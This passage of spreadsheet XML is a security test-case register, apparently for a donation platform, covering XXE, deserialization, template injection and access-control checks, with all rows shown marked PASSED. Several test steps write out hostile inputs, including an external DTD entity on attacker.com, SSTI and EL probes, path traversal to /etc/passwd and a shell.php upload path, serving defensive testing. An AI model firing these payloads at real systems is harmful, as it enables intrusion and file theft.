          <t>SEC-XXE-016</t>
        </is>
      </c>
      <c r="B117" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C117" s="16" t="inlineStr">
        <is>
          <t>Rss / Atom Feed Parser XXE Audit</t>
        </is>
      </c>
      <c r="D117" s="16" t="inlineStr">
        <is>
          <t>Supply RSS feed URL containing XXE payload</t>
        </is>
      </c>
      <c r="E117" s="16" t="inlineStr">
        <is>
          <t>RSS feed XXE</t>
        </is>
      </c>
      <c r="F117" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G117" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H117" s="16" t="inlineStr">
        <is>
          <t>Feed parser disables external entity resolution and DTD loading</t>
        </is>
      </c>
    </row>
    <row r="118" ht="22" customHeight="1">
      <c r="A118" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-017</t>
        </is>
      </c>
      <c r="B118" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C118" s="16" t="inlineStr">
        <is>
          <t>Office Document (docx/xlsx) XXE Vulnerability</t>
        </is>
      </c>
      <c r="D118" s="16" t="inlineStr">
        <is>
          <t>Upload Word/Excel file with modified xl/workbook.xml containing XXE</t>
        </is>
      </c>
      <c r="E118" s="16" t="inlineStr">
        <is>
          <t>OpenXML XXE payload</t>
        </is>
      </c>
      <c r="F118" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G118" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H118" s="16" t="inlineStr">
        <is>
          <t>Document parser strips external DTDs prior to parsing OpenXML structure</t>
        </is>
      </c>
    </row>
    <row r="119" ht="22" customHeight="1">
      <c r="A119" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-018</t>
        </is>
      </c>
      <c r="B119" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C119" s="16" t="inlineStr">
        <is>
          <t>Unsafe JSON Evaluator Disablement</t>
        </is>
      </c>
      <c r="D119" s="16" t="inlineStr">
        <is>
          <t>Inspect code for usage of eval() or new Function() with JSON</t>
        </is>
      </c>
      <c r="E119" s="16" t="inlineStr">
        <is>
          <t>Codebase eval audit</t>
        </is>
      </c>
      <c r="F119" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G119" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H119" s="16" t="inlineStr">
        <is>
          <t>Native JSON.parse() used exclusively; Dynamic code evaluation absent</t>
        </is>
      </c>
    </row>
    <row r="120" ht="22" customHeight="1">
      <c r="A120" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-019</t>
        </is>
      </c>
      <c r="B120" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C120" s="16" t="inlineStr">
        <is>
          <t>Expression Language (EL) Injection Prevention</t>
        </is>
      </c>
      <c r="D120" s="16" t="inlineStr">
        <is>
          <t>Inject ${1+1} or #{processBuilder} into template input</t>
        </is>
      </c>
      <c r="E120" s="16" t="inlineStr">
        <is>
          <t>EL Injection payload</t>
        </is>
      </c>
      <c r="F120" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G120" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H120" s="16" t="inlineStr">
        <is>
          <t>Template engine configured with strict sandbox; EL execution disabled</t>
        </is>
      </c>
    </row>
    <row r="121" ht="22" customHeight="1">
      <c r="A121" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-020</t>
        </is>
      </c>
      <c r="B121" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C121" s="16" t="inlineStr">
        <is>
          <t>Server-Side Template Injection (SSTI) in Email Generator</t>
        </is>
      </c>
      <c r="D121" s="16" t="inlineStr">
        <is>
          <t>Pass {{7*7}} or {{config.items()}} in user name for email</t>
        </is>
      </c>
      <c r="E121" s="16" t="inlineStr">
        <is>
          <t>SSTI payload {{7*7}}</t>
        </is>
      </c>
      <c r="F121" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G121" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H121" s="16" t="inlineStr">
        <is>
          <t>Output rendered as literal text '{{7*7}}'; Template context isolated</t>
        </is>
      </c>
    </row>
    <row r="122" ht="22" customHeight="1">
      <c r="A122" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-021</t>
        </is>
      </c>
      <c r="B122" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C122" s="16" t="inlineStr">
        <is>
          <t>BSON Deserialization Type Confusion Check</t>
        </is>
      </c>
      <c r="D122" s="16" t="inlineStr">
        <is>
          <t>Send BSON payload with unexpected binary data types</t>
        </is>
      </c>
      <c r="E122" s="16" t="inlineStr">
        <is>
          <t>BSON type confusion</t>
        </is>
      </c>
      <c r="F122" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G122" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H122" s="16" t="inlineStr">
        <is>
          <t>Strict BSON schema validation converts types safely or rejects</t>
        </is>
      </c>
    </row>
    <row r="123" ht="22" customHeight="1">
      <c r="A123" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-022</t>
        </is>
      </c>
      <c r="B123" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C123" s="16" t="inlineStr">
        <is>
          <t>XML Parameter Entity (XPE) Exfiltration Prevention</t>
        </is>
      </c>
      <c r="D123" s="16" t="inlineStr">
        <is>
          <t>Inject % xpe SYSTEM 'http://attacker.com/eval.dtd'</t>
        </is>
      </c>
      <c r="E123" s="16" t="inlineStr">
        <is>
          <t>XPE payload</t>
        </is>
      </c>
      <c r="F123" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G123" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H123" s="16" t="inlineStr">
        <is>
          <t>Parameter entities disabled in XML parser configuration</t>
        </is>
      </c>
    </row>
    <row r="124" ht="22" customHeight="1">
      <c r="A124" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-023</t>
        </is>
      </c>
      <c r="B124" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C124" s="16" t="inlineStr">
        <is>
          <t>Protocol Buffer (Protobuf) Message Pollution</t>
        </is>
      </c>
      <c r="D124" s="16" t="inlineStr">
        <is>
          <t>Send Protobuf message with unknown field tags</t>
        </is>
      </c>
      <c r="E124" s="16" t="inlineStr">
        <is>
          <t>Protobuf unknown tags</t>
        </is>
      </c>
      <c r="F124" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G124" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H124" s="16" t="inlineStr">
        <is>
          <t>Protobuf parser discards unknown fields without execution side-effects</t>
        </is>
      </c>
    </row>
    <row r="125" ht="22" customHeight="1">
      <c r="A125" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-024</t>
        </is>
      </c>
      <c r="B125" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C125" s="16" t="inlineStr">
        <is>
          <t>JWT Deserialization Type Confusion</t>
        </is>
      </c>
      <c r="D125" s="16" t="inlineStr">
        <is>
          <t>Send JWT with complex nested object in claims field</t>
        </is>
      </c>
      <c r="E125" s="16" t="inlineStr">
        <is>
          <t>JWT payload type confusion</t>
        </is>
      </c>
      <c r="F125" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G125" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H125" s="16" t="inlineStr">
        <is>
          <t>JWT claims validation enforces primitive string/number types</t>
        </is>
      </c>
    </row>
    <row r="126" ht="22" customHeight="1">
      <c r="A126" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-025</t>
        </is>
      </c>
      <c r="B126" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C126" s="16" t="inlineStr">
        <is>
          <t>GraphQL AST Query Parsing DoS Protection</t>
        </is>
      </c>
      <c r="D126" s="16" t="inlineStr">
        <is>
          <t>Send 500KB GraphQL query text string</t>
        </is>
      </c>
      <c r="E126" s="16" t="inlineStr">
        <is>
          <t>Massive GraphQL AST payload</t>
        </is>
      </c>
      <c r="F126" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G126" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H126" s="16" t="inlineStr">
        <is>
          <t>Query string length limited to 10KB prior to AST parsing</t>
        </is>
      </c>
    </row>
    <row r="127" ht="22" customHeight="1">
      <c r="A127" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-001</t>
        </is>
      </c>
      <c r="B127" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C127" s="16" t="inlineStr">
        <is>
          <t>Insecure Direct Object Reference (IDOR) on User Profile</t>
        </is>
      </c>
      <c r="D127" s="16" t="inlineStr">
        <is>
          <t>Change user_id query param from /api/users/101 to /api/users/102</t>
        </is>
      </c>
      <c r="E127" s="16" t="inlineStr">
        <is>
          <t>GET /api/users/102</t>
        </is>
      </c>
      <c r="F127" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G127" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H127" s="16" t="inlineStr">
        <is>
          <t>Access Denied 403 Forbidden; User can only view their own profile</t>
        </is>
      </c>
    </row>
    <row r="128" ht="22" customHeight="1">
      <c r="A128" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-002</t>
        </is>
      </c>
      <c r="B128" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C128" s="16" t="inlineStr">
        <is>
          <t>IDOR on Donation Edit Endpoint</t>
        </is>
      </c>
      <c r="D128" s="16" t="inlineStr">
        <is>
          <t>Send PUT /api/donations/999 belonging to another donor</t>
        </is>
      </c>
      <c r="E128" s="16" t="inlineStr">
        <is>
          <t>PUT /api/donations/999</t>
        </is>
      </c>
      <c r="F128" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G128" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H128" s="16" t="inlineStr">
        <is>
          <t>Authorization middleware verifies ownership; Returns 403 Forbidden</t>
        </is>
      </c>
    </row>
    <row r="129" ht="22" customHeight="1">
      <c r="A129" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-003</t>
        </is>
      </c>
      <c r="B129" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C129" s="16" t="inlineStr">
        <is>
          <t>Horizontal Privilege Escalation on Claim History</t>
        </is>
      </c>
      <c r="D129" s="16" t="inlineStr">
        <is>
          <t>Request claim records of another receiver user</t>
        </is>
      </c>
      <c r="E129" s="16" t="inlineStr">
        <is>
          <t>GET /api/claims/usr_other</t>
        </is>
      </c>
      <c r="F129" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G129" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H129" s="16" t="inlineStr">
        <is>
          <t>Session identity enforced; Returns current user's claims only</t>
        </is>
      </c>
    </row>
    <row r="130" ht="22" customHeight="1">
      <c r="A130" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-004</t>
        </is>
      </c>
      <c r="B130" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C130" s="16" t="inlineStr">
        <is>
          <t>Vertical Privilege Escalation to Admin Endpoint</t>
        </is>
      </c>
      <c r="D130" s="16" t="inlineStr">
        <is>
          <t>Authenticated Receiver attempts POST /api/admin/system-reset</t>
        </is>
      </c>
      <c r="E130" s="16" t="inlineStr">
        <is>
          <t>POST /api/admin/*</t>
        </is>
      </c>
      <c r="F130" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G130" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H130" s="16" t="inlineStr">
        <is>
          <t>Role-based access control (RBAC) blocks non-admin user; 403 Forbidden</t>
        </is>
      </c>
    </row>
    <row r="131" ht="22" customHeight="1">
      <c r="A131" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-005</t>
        </is>
      </c>
      <c r="B131" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C131" s="16" t="inlineStr">
        <is>
          <t>Bypass Access Control via Method Tampering</t>
        </is>
      </c>
      <c r="D131" s="16" t="inlineStr">
        <is>
          <t>Send GET request converted to HEAD, OPTIONS, or POST to admin path</t>
        </is>
      </c>
      <c r="E131" s="16" t="inlineStr">
        <is>
          <t>Method tampering HTTP requests</t>
        </is>
      </c>
      <c r="F131" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G131" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H131" s="16" t="inlineStr">
        <is>
          <t>Security filter evaluates path access rules across all HTTP methods</t>
        </is>
      </c>
    </row>
    <row r="132" ht="22" customHeight="1">
      <c r="A132" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-006</t>
        </is>
      </c>
      <c r="B132" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C132" s="16" t="inlineStr">
        <is>
          <t>Missing Function Level Access Control on Reports</t>
        </is>
      </c>
      <c r="D132" s="16" t="inlineStr">
        <is>
          <t>Access /api/admin/financial-report without admin token</t>
        </is>
      </c>
      <c r="E132" s="16" t="inlineStr">
        <is>
          <t>Unauthenticated admin API call</t>
        </is>
      </c>
      <c r="F132" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G132" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H132" s="16" t="inlineStr">
        <is>
          <t>401 Unauthorized returned; Token &amp; Admin scope mandatory</t>
        </is>
      </c>
    </row>
    <row r="133" ht="22" customHeight="1">
      <c r="A133" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-007</t>
        </is>
      </c>
      <c r="B133" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C133" s="16" t="inlineStr">
        <is>
          <t>Privilege Escalation via Parameter Pollution</t>
        </is>
      </c>
      <c r="D133" s="16" t="inlineStr">
        <is>
          <t>Send GET /api/user?role=donor&amp;role=admin</t>
        </is>
      </c>
      <c r="E133" s="16" t="inlineStr">
        <is>
          <t>HTTP Parameter Pollution</t>
        </is>
      </c>
      <c r="F133" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G133" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H133" s="16" t="inlineStr">
        <is>
          <t>Parameters array normalized; Highest restriction rule applied</t>
        </is>
      </c>
    </row>
    <row r="134" ht="22" customHeight="1">
      <c r="A134" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-008</t>
        </is>
      </c>
      <c r="B134" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C134" s="16" t="inlineStr">
        <is>
          <t>IDOR on Password Reset API</t>
        </is>
      </c>
      <c r="D134" s="16" t="inlineStr">
        <is>
          <t>Send POST /api/auth/reset-password with targeted user_id</t>
        </is>
      </c>
      <c r="E134" s="16" t="inlineStr">
        <is>
          <t>Target user_id override</t>
        </is>
      </c>
      <c r="F134" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G134" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H134" s="16" t="inlineStr">
        <is>
          <t>Reset token strictly bound to authenticated account session</t>
        </is>
      </c>
    </row>
    <row r="135" ht="22" customHeight="1">
      <c r="A135" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-009</t>
        </is>
      </c>
      <c r="B135" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C135" s="16" t="inlineStr">
        <is>
          <t>Access Control Bypass via Case Sensitivity Manipulation</t>
        </is>
      </c>
      <c r="D135" s="16" t="inlineStr">
        <is>
          <t>Navigate to /ADMIN/users or /Admin/Users</t>
        </is>
      </c>
      <c r="E135" s="16" t="inlineStr">
        <is>
          <t>Case variation path requests</t>
        </is>
      </c>
      <c r="F135" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G135" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H135" s="16" t="inlineStr">
        <is>
          <t>URL path matching normalized to lowercase before RBAC evaluation</t>
        </is>
      </c>
    </row>
    <row r="136" ht="22" customHeight="1">
      <c r="A136" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-010</t>
        </is>
      </c>
      <c r="B136" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C136" s="16" t="inlineStr">
        <is>
          <t>Access Control Bypass via URL Encoding</t>
        </is>
      </c>
      <c r="D136" s="16" t="inlineStr">
        <is>
          <t>Navigate to /%61dmin/users or /admin/%2e%2e/admin/users</t>
        </is>
      </c>
      <c r="E136" s="16" t="inlineStr">
        <is>
          <t>URL encoded path traversal</t>
        </is>
      </c>
      <c r="F136" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G136" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H136" s="16" t="inlineStr">
        <is>
          <t>URL decoded prior to security filter evaluation; Access denied</t>
        </is>
      </c>
    </row>
    <row r="137" ht="22" customHeight="1">
      <c r="A137" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-011</t>
        </is>
      </c>
      <c r="B137" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C137" s="16" t="inlineStr">
        <is>
          <t>Access Control Bypass via IP Whitelisting Headers</t>
        </is>
      </c>
      <c r="D137" s="16" t="inlineStr">
        <is>
          <t>Add header X-Forwarded-For: 127.0.0.1 to access internal admin</t>
        </is>
      </c>
      <c r="E137" s="16" t="inlineStr">
        <is>
          <t>Spoofed X-Forwarded-For</t>
        </is>
      </c>
      <c r="F137" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G137" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H137" s="16" t="inlineStr">
        <is>
          <t>IP whitelist relies on trusted reverse proxy connection IP, not headers</t>
        </is>
      </c>
    </row>
    <row r="138" ht="22" customHeight="1">
      <c r="A138" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-012</t>
        </is>
      </c>
      <c r="B138" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C138" s="16" t="inlineStr">
        <is>
          <t>IDOR on Image / Attachment Download</t>
        </is>
      </c>
      <c r="D138" s="16" t="inlineStr">
        <is>
          <t>Request GET /api/attachments/att_other_user_123.pdf</t>
        </is>
      </c>
      <c r="E138" s="16" t="inlineStr">
        <is>
          <t>Direct attachment URL</t>
        </is>
      </c>
      <c r="F138" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G138" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H138" s="16" t="inlineStr">
        <is>
          <t>Attachment access verified against document owner permission matrix</t>
        </is>
      </c>
    </row>
    <row r="139" ht="22" customHeight="1">
      <c r="A139" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-013</t>
        </is>
      </c>
      <c r="B139" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C139" s="16" t="inlineStr">
        <is>
          <t>Tenant Data Isolation in Multi-Tenant API</t>
        </is>
      </c>
      <c r="D139" s="16" t="inlineStr">
        <is>
          <t>Tenant A attempts to query Tenant B organization data</t>
        </is>
      </c>
      <c r="E139" s="16" t="inlineStr">
        <is>
          <t>Cross-tenant data query</t>
        </is>
      </c>
      <c r="F139" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G139" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H139" s="16" t="inlineStr">
        <is>
          <t>Database query automatically appends tenant_id filter from JWT</t>
        </is>
      </c>
    </row>
    <row r="140" ht="22" customHeight="1">
      <c r="A140" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-014</t>
        </is>
      </c>
      <c r="B140" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C140" s="16" t="inlineStr">
        <is>
          <t>Bypass Access Control via HTTP Header Override</t>
        </is>
      </c>
      <c r="D140" s="16" t="inlineStr">
        <is>
          <t>Add X-Original-URL: /api/admin or X-Rewrite-URL: /api/admin</t>
        </is>
      </c>
      <c r="E140" s="16" t="inlineStr">
        <is>
          <t>Header path override</t>
        </is>
      </c>
      <c r="F140" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G140" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H140" s="16" t="inlineStr">
        <is>
          <t>Header overrides disabled in reverse proxy gateway</t>
        </is>
      </c>
    </row>
    <row r="141" ht="22" customHeight="1">
      <c r="A141" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-015</t>
        </is>
      </c>
      <c r="B141" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C141" s="16" t="inlineStr">
        <is>
          <t>IDOR on API Notification Subscription</t>
        </is>
      </c>
      <c r="D141" s="16" t="inlineStr">
        <is>
          <t>DELETE /api/subscriptions/sub_other_user</t>
        </is>
      </c>
      <c r="E141" s="16" t="inlineStr">
        <is>
          <t>Delete subscriber endpoint</t>
        </is>
      </c>
      <c r="F141" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G141" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H141" s="16" t="inlineStr">
        <is>
          <t>Subscription ownership validated; 403 Forbidden returned</t>
        </is>
      </c>
    </row>
    <row r="142" ht="22" customHeight="1">
      <c r="A142" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-016</t>
        </is>
      </c>
      <c r="B142" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C142" s="16" t="inlineStr">
        <is>
          <t>Unrestricted File Download Vulnerability</t>
        </is>
      </c>
      <c r="D142" s="16" t="inlineStr">
        <is>
          <t>Request GET /api/download?file=../../../../etc/passwd</t>
        </is>
      </c>
      <c r="E142" s="16" t="inlineStr">
        <is>
          <t>Path traversal download</t>
        </is>
      </c>
      <c r="F142" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G142" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H142" s="16" t="inlineStr">
        <is>
          <t>Filename sanitized using path.basename(); Directory traversal blocked</t>
        </is>
      </c>
    </row>
    <row r="143" ht="22" customHeight="1">
      <c r="A143" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-017</t>
        </is>
      </c>
      <c r="B143" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C143" s="16" t="inlineStr">
        <is>
          <t>Unrestricted File Upload Destination</t>
        </is>
      </c>
      <c r="D143" s="16" t="inlineStr">
        <is>
          <t>Upload file with path ../../../var/www/shell.php in filename</t>
        </is>
      </c>
      <c r="E143" s="16" t="inlineStr">
        <is>
          <t>Path traversal upload</t>
        </is>
      </c>
      <c r="F143" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G143" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H143" s="16" t="inlineStr">
        <is>
          <t>Upload directory isolated; Filename auto-generated UUID</t>
        </is>
      </c>
    </row>
    <row r="144" ht="22" customHeight="1">
      <c r="A144" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-018</t>
        </is>
      </c>
      <c r="B144" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C144" s="16" t="inlineStr">
        <is>
          <t>CORS Misconfiguration - Arbitrary Origin Trust</t>
        </is>
      </c>
      <c r="D144" s="16" t="inlineStr">
        <is>
          <t>Send Origin: https://attacker.com in CORS request</t>
        </is>
      </c>
      <c r="E144" s="16" t="inlineStr">
        <is>
          <t>Origin header manipulation</t>
        </is>
      </c>
      <c r="F144" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G144" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H144" s="16" t="inlineStr">
        <is>
          <t>CORS header returns allowed whitelist domain only; Arbitrary origins blocked</t>
        </is>
      </c>
    </row>
    <row r="145" ht="22" customHeight="1">
      <c r="A145" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-019</t>
        </is>
      </c>
      <c r="B145" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C145" s="16" t="inlineStr">
        <is>
          <t>CORS Misconfiguration - Null Origin Trust</t>
        </is>
      </c>
      <c r="D145" s="16" t="inlineStr">
        <is>
          <t>Send Origin: null in sandboxed iframe request</t>
        </is>
      </c>
      <c r="E145" s="16" t="inlineStr">
        <is>
          <t>Origin: null payload</t>
        </is>
      </c>
      <c r="F145" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G145" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H145" s="16" t="inlineStr">
        <is>
          <t>Origin null explicitly disallowed in CORS configuration</t>
        </is>
      </c>
    </row>
    <row r="146" ht="22" customHeight="1">
      <c r="A146" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-020</t>
        </is>
      </c>
      <c r="B146" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C146" s="16" t="inlineStr">
        <is>
          <t>CORS Misconfiguration - Wildcard with Credentials</t>
        </is>
      </c>
      <c r="D146" s="16" t="inlineStr">
        <is>
          <t>Inspect Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true</t>
        </is>
      </c>
      <c r="E146" s="16" t="inlineStr">
        <is>
          <t>CORS Credentials check</t>
        </is>
      </c>
      <c r="F146" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G146" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H146" s="16" t="inlineStr">
        <is>
          <t>Wildcard '*' disallowed when credentials flag is enabled</t>
        </is>
      </c>
    </row>
    <row r="147" ht="22" customHeight="1">
      <c r="A147" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-021</t>
        </is>
      </c>
      <c r="B147" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C147" s="16" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) on Profile Update</t>
        </is>
      </c>
      <c r="D147" s="16" t="inlineStr">
        <is>
          <t>Submit POST request to /api/profile from external domain iframe</t>
        </is>
      </c>
      <c r="E147" s="16" t="inlineStr">
        <is>
          <t>Cross-site POST request</t>
        </is>
      </c>
      <c r="F147" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G147" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H147" s="16" t="inlineStr">
        <is>
          <t>CSRF token / SameSite cookie requirement blocks unauthorized cross-site POST</t>
        </is>
      </c>
    </row>
    <row r="148" ht="22" customHeight="1">
      <c r="A148" s="15" t="inlineStr">
        <is>
          <t>SEC-ACC-022</t>
        </is>
      </c>
      <c r="B148" s="16" t="inlineStr">
        <is>
          <t>Broken Access Control &amp; IDOR</t>
        </is>
      </c>
      <c r="C148" s="16" t="inlineStr">
        <is>
